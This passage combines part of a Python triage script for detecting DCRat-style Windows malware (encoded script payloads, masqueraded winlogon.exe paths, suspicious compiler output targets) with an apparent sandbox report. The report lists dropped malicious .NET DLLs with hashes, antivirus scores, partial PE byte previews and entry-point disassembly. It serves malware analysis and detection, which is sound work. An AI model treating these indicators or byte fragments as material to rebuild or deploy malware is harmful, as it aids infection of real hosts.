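    report = {}
    for label, content in records.items():
        if label.endswith(".bat"):
            report[label] = triage_batch(content)
        elif label.endswith(".cmdline"):
            report[label] = triage_compiler_cmdline(content)
        else:
            n = script_encoder_body_length(content)
            report[label] = [f"Windows Script Encoder payload, {n} encoded bytes"] if n else []
    return report


# Paths quoted in the report (the C# loader's Process.Start target and the
# C:\Recovery dropper process) plus one genuine location as a negative control.
PATHS = [r"C:\Windows\system32\SecurityHealthSystray.exe.exe",
         r"C:\Recovery\winlogon.exe",
         r"C:\Windows\System32\winlogon.exe"]

if __name__ == "__main__":
    for label, findings in triage(RECORDS).items():
        print(label, "->", findings or "clean")
    for path in PATHS:
        print(path, "->", masquerade_check(path) or "expected location")
```

The padding check deliberately tolerates the handful of variables every Windows host defines (%AppData% is legitimately used here to reach the DCRat drop directory) and only fires on three or more names that nothing would expand; the compiler check keys on the /out target rather than the binary name, because the path C:\Windows\system32\SecurityHealthSystray.exe is exactly where the real tray helper lives and a name-based rule would stay silent.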
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            • Antivirus: Virustotal, Detection: 20%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: ZT3pxe2Tb4.exe, Detection: malicious
                                                                                            • Filename: O5OjRoFGIW.exe, Detection: malicious
                                                                                            • Filename: iY40ylvr5y.exe, Detection: malicious
                                                                                            • Filename: 7GTGpZi6oi.exe, Detection: malicious
                                                                                            • Filename: GWCscceJsW.exe, Detection: malicious
                                                                                            • Filename: QHZoYVBjSD.exe, Detection: malicious
                                                                                            • Filename: qObijSd3Uj.exe, Detection: malicious
                                                                                            • Filename: 2EHDj2G1ow.exe, Detection: malicious
                                                                                            • Filename: UU5WXfH85a.exe, Detection: malicious
                                                                                            • Filename: k6AIKkidxG.exe, Detection: malicious
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 67%
                                                                                            • Antivirus: Virustotal, Detection: 69%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 67%
                                                                                            • Antivirus: Virustotal, Detection: 69%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                                            • Antivirus: Virustotal, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            • Antivirus: Virustotal, Detection: 10%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):32256
                                                                                            Entropy (8bit):5.631194486392901
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 10%
                                                                                            • Antivirus: Virustotal, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                            • Antivirus: Virustotal, Detection: 10%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):9728
                                                                                            Entropy (8bit):5.0168086460579095
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                            MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                            SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                            SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                            SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            • Antivirus: Virustotal, Detection: 1%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):9728
                                                                                            Entropy (8bit):5.0168086460579095
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                            MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                            SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                            SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                            SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            • Antivirus: Virustotal, Detection: 1%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):22016
                                                                                            Entropy (8bit):5.41854385721431
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                             • Antivirus: Virustotal, Detection: 7%
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):22016
                                                                                            Entropy (8bit):5.41854385721431
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                             • Antivirus: Virustotal, Detection: 7%
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):69632
                                                                                            Entropy (8bit):5.932541123129161
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1224
                                                                                            Entropy (8bit):4.435108676655666
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.9874947242875076
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6bpDPtKM7Jt8Bs3FJsdcV4MKe27nd6YgYzLvqBHmOulajfqXSfbNtm:WPZPc+Vx9M8RYPvkAcjRzNt
                                                                                            MD5:AB5598E43F67BE1C10F7E5A8AF37C34D
                                                                                            SHA1:0CD56F0C9830E0BE4DB6242ECDE01996D77CA2F1
                                                                                            SHA-256:1F2B3DD31DC8223ECA3DDDBCDAB3EB9F20C589E2DB943C930643DF4D6DB535B9
                                                                                            SHA-512:3882365301088096879195A5E11EAEA4EFE30559383331FBC3628DEE045CEF08F1B6DA9FE9F0F5DBAE0B5BC9C1B52ED1D1316CE78927CD72D25D649647B44E9B
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):151
                                                                                            Entropy (8bit):4.854617761109343
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FXHUTfejNvoTybHKvj:Vx993DEUaUyGW7s
                                                                                            MD5:57CAE729DBFB3B33CE80F59AC240EF14
                                                                                            SHA1:A2C4D7E162293FE2B91BEE2FC04F883E443BA4A1
                                                                                            SHA-256:0E191D0C5924BA0032845AF97A0C907A7454E47730C0CEB0D98D51E4D8ACB321
                                                                                            SHA-512:C9A3AC877F0FDC9721223F7754DFF1B49748EB0C0DA6101E7D7A925A45751E6836C8AF54D9455F0F4A4BFAF5D6ED8EF351CBADAD3D662782D5041BDFCB0E3E54
                                                                                            Malicious:false
                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 29/03/2024 16:40:56..16:40:56, error: 0x80072746.16:41:01, error: 0x80072746.
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.763479339524128
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:H9gMIu2HXi.exe
                                                                                            File size:1'811'992 bytes
                                                                                            MD5:4fb1d8f8dff638f2c9b382f9552b18e2
                                                                                            SHA1:5bc4dbad7914ceb72dba45d1b1efffba40143653
                                                                                            SHA256:b706a1a67f20b5e029c058de6a1e681a36fea762f69b9d983921d0e47ec2bc6c
                                                                                            SHA512:02fb08958f7e5abb2ae99ec87efb1ad4c7e2c895d314927af4ed452f0ba855d7d248788f46906f5b671984cc4600f31d5b97f9c3901a0238ffe36fc7582db476
                                                                                            SSDEEP:24576:AubsnafAPyjiDkXubsnafAPyjZrvoW9jdO1T2qdg+GTjMZpCfJYLw289l2zHTJnP:mIpfI1voojGT0MCfJ3AzHTlvxKyH0s1
                                                                                            TLSH:BF851203B5C0D9B2D46218330B26AF61A67DBD301F618DDB93941D5EEE322D0A736B67
                                                                                            Icon Hash:313397069e1b3371
                                                                                            Entrypoint:0x420790
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x64C8CFB2 [Tue Aug 1 09:26:10 2023 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:0ae9e38912ff6bd742a1b9e5c003576a
                                                                                            Instruction
                                                                                            call 00007FBA24BF21DBh
                                                                                            jmp 00007FBA24BF1B8Dh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push 00423A90h
                                                                                            push dword ptr fs:[00000000h]
                                                                                            mov eax, dword ptr [esp+10h]
                                                                                            mov dword ptr [esp+10h], ebp
                                                                                            lea ebp, dword ptr [esp+10h]
                                                                                            sub esp, eax
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            mov eax, dword ptr [004407A8h]
                                                                                            xor dword ptr [ebp-04h], eax
                                                                                            xor eax, ebp
                                                                                            push eax
                                                                                            mov dword ptr [ebp-18h], esp
                                                                                            push dword ptr [ebp-08h]
                                                                                            mov eax, dword ptr [ebp-04h]
                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                            mov dword ptr [ebp-08h], eax
                                                                                            lea eax, dword ptr [ebp-10h]
                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            mov ecx, dword ptr [ebp-10h]
                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                            pop ecx
                                                                                            pop edi
                                                                                            pop edi
                                                                                            pop esi
                                                                                            pop ebx
                                                                                            mov esp, ebp
                                                                                            pop ebp
                                                                                            push ecx
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007FBA24BE4A21h
                                                                                            push 0043D14Ch
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007FBA24BF4835h
                                                                                            int3
                                                                                            jmp 00007FBA24BF6708h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            and dword ptr [00463D58h], 00000000h
                                                                                            sub esp, 24h
                                                                                            or dword ptr [004407A0h], 01h
                                                                                            push 0000000Ah
                                                                                            call dword ptr [004341C4h]
                                                                                            test eax, eax
                                                                                            je 00007FBA24BF1EC2h
                                                                                            and dword ptr [ebp-10h], 00000000h
                                                                                            xor eax, eax
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            xor ecx, ecx
                                                                                            lea edi, dword ptr [ebp-24h]
                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                             Name | Virtual Address | Virtual Size | Is in Section
                                                                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3e380 | 0x34 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e3b4 | 0x50 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0xeb98 | .rsrc
                                                                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x75000 | 0x23dc | .reloc
                                                                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3c1b0 | 0x54 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x366a8 | 0x40 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x34000 | 0x278 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3d85c | 0x120 | .rdata
                                                                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
